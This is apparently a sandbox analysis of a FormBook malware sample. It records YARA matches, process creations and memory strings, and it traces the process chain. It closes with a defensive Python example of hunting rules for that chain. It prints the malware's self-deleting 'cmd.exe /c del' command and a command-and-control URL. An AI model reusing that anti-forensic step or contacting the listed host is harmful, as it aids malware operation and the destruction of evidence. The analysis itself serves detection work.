Source: 00000009.00000002.909537061.0000000000610000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.909537061.0000000000610000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.668734008.00000000039F9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.668734008.00000000039F9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.g1EhgmCqCD.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.g1EhgmCqCD.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.g1EhgmCqCD.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.g1EhgmCqCD.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: g1EhgmCqCD.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine | Classification label: mal100.troj.evad.winEXE@7/1@13/5
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\g1EhgmCqCD.exe.log
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7116:120:WilError_01
Source: g1EhgmCqCD.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: g1EhgmCqCD.exe, 00000001.00000002.667933486.0000000002A62000.00000004.00000001.sdmp | Binary or memory string: Select * from Clientes WHERE id=@id;;
Source: g1EhgmCqCD.exe, 00000001.00000002.667933486.0000000002A62000.00000004.00000001.sdmp | Binary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: g1EhgmCqCD.exe, 00000001.00000002.667933486.0000000002A62000.00000004.00000001.sdmp | Binary or memory string: Select * from SecurityLogonType WHERE id=@id;
Source: g1EhgmCqCD.exe, 00000001.00000002.667933486.0000000002A62000.00000004.00000001.sdmp | Binary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
Source: g1EhgmCqCD.exe, 00000001.00000002.667933486.0000000002A62000.00000004.00000001.sdmp | Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: g1EhgmCqCD.exe, 00000001.00000002.667933486.0000000002A62000.00000004.00000001.sdmp | Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: g1EhgmCqCD.exe, 00000001.00000002.667933486.0000000002A62000.00000004.00000001.sdmp | Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: g1EhgmCqCD.exe, 00000001.00000002.667933486.0000000002A62000.00000004.00000001.sdmp | Binary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
Source: g1EhgmCqCD.exe, 00000001.00000002.667933486.0000000002A62000.00000004.00000001.sdmp | Binary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
Source: g1EhgmCqCD.exe | Virustotal: Detection: 19%
Source: g1EhgmCqCD.exe | ReversingLabs: Detection: 25%
Source: unknown | Process created: C:\Users\user\Desktop\g1EhgmCqCD.exe 'C:\Users\user\Desktop\g1EhgmCqCD.exe'
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Process created: C:\Users\user\Desktop\g1EhgmCqCD.exe C:\Users\user\Desktop\g1EhgmCqCD.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\g1EhgmCqCD.exe'
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Process created: C:\Users\user\Desktop\g1EhgmCqCD.exe C:\Users\user\Desktop\g1EhgmCqCD.exe
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\g1EhgmCqCD.exe'
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8856F961-340A-11D0-A96B-00C04FD705A2}\InProcServer32
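The process chain recorded above is the staging the rest of the report is built on: the .NET loader (process 1, the one writing the CLR_v4.0_32 usage log) starts a second copy of itself (process 3), which is where the FormBook Yara rules match at 0x400000; explorer.exe then starts a 32-bit msiexec.exe (process 9) with no arguments, which is where the rules match again and where the C2 URL string https://mollysmulligan.com/8u3b/?DzrXY=Q16 was found; finally that msiexec.exe runs cmd.exe /c del against the original sample. On a real host that last step means the dropper is gone from disk by the time anyone looks, so the file has to come from EDR file capture, mail gateway quarantine or backups rather than from the victim's Desktop.

The following Python is an added example, not part of the Joe Sandbox report: three hunting rules over Sysmon Event ID 1 style process-creation records, run against constructed events that mirror the chain (the PIDs and the explorer.exe parent of the first process are made up; the report lists that parent as unknown). The rules are this example's own. The middle one is deliberately narrowed to 32-bit images under SysWOW64 started by explorer.exe without arguments; a plain "explorer.exe starts a system binary" rule would fire on every Start menu launch, which is what the notepad.exe control event is there to show.

```python
"""Added example, not part of the Joe Sandbox report: three hunting rules over
process-creation events, applied to a constructed copy of the report's chain."""
import re

# Constructed events in Sysmon Event ID 1 style. PIDs are made up; the images
# and command lines follow the chain in the report. notepad.exe is a benign
# control that the explorer.exe rule must not flag.
SAMPLE = r"C:\Users\user\Desktop\g1EhgmCqCD.exe"
EXPLORER = r"C:\Windows\explorer.exe"
MSIEXEC = r"C:\Windows\SysWOW64\msiexec.exe"
CMD = r"C:\Windows\SysWOW64\cmd.exe"
EVENTS = [
    {"pid": 4100, "ppid": 3980, "image": SAMPLE, "parent_image": EXPLORER,
     "cmdline": f'"{SAMPLE}"'},
    {"pid": 4116, "ppid": 4100, "image": SAMPLE, "parent_image": SAMPLE,
     "cmdline": SAMPLE},
    {"pid": 5320, "ppid": 3980, "image": MSIEXEC, "parent_image": EXPLORER,
     "cmdline": MSIEXEC},
    {"pid": 5336, "ppid": 5320, "image": CMD, "parent_image": MSIEXEC,
     "cmdline": f'{CMD} /c del "{SAMPLE}"'},
    {"pid": 5348, "ppid": 5336, "image": r"C:\Windows\System32\conhost.exe",
     "parent_image": CMD,
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
    {"pid": 6000, "ppid": 3980, "image": r"C:\Windows\System32\notepad.exe",
     "parent_image": EXPLORER, "cmdline": r"C:\Windows\System32\notepad.exe"},
]

USER_WRITABLE = ("\\users\\", "\\programdata\\", "\\temp\\")
# target of a `del`, with or without the quotes cmd.exe would carry
DEL_RE = re.compile(r"\bdel\s+[\"']?([A-Za-z]:\\[^\"']+?)[\"']?\s*$", re.IGNORECASE)


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def _no_arguments(ev):
    """True when the command line is just the image path, quoted or not."""
    return ev["cmdline"].strip().strip("\"'").lower() == ev["image"].lower()


def hunt(events):
    """Return (rule, pid, detail) tuples for the three behaviours in the chain."""
    images = {ev["image"].lower() for ev in events}
    findings = []
    for ev in events:
        image, parent = ev["image"].lower(), ev["parent_image"].lower()
        # 1. a binary in a user-writable path starts a second copy of itself:
        #    the loader's child that is then hollowed
        if image == parent and any(d in image for d in USER_WRITABLE):
            findings.append(("self_spawn_from_user_path", ev["pid"], ev["image"]))
        # 2. explorer.exe starts a 32-bit system binary with no arguments:
        #    the injected explorer.exe picking a host process for the payload
        if _basename(parent) == "explorer.exe" and "\\syswow64\\" in image and _no_arguments(ev):
            findings.append(("explorer_spawns_wow64_binary_without_args", ev["pid"], ev["image"]))
        # 3. cmd.exe deletes the on-disk image of another process in the window:
        #    the payload removing the dropper
        m = DEL_RE.search(ev["cmdline"]) if _basename(image) == "cmd.exe" else None
        if m and m.group(1).lower() in images:
            findings.append(("deletes_another_process_image", ev["pid"], m.group(1)))
    return findings


if __name__ == "__main__":
    for rule, pid, detail in hunt(EVENTS):
        print(f"{rule}: pid {pid} -> {detail}")
```

Rule 3 only works because it correlates against every image seen in the same window, not against the deleting process's own ancestry: the cmd.exe here descends from explorer.exe and msiexec.exe, neither of which ever ran from the Desktop, so a rule that only looked up the parent chain would miss it.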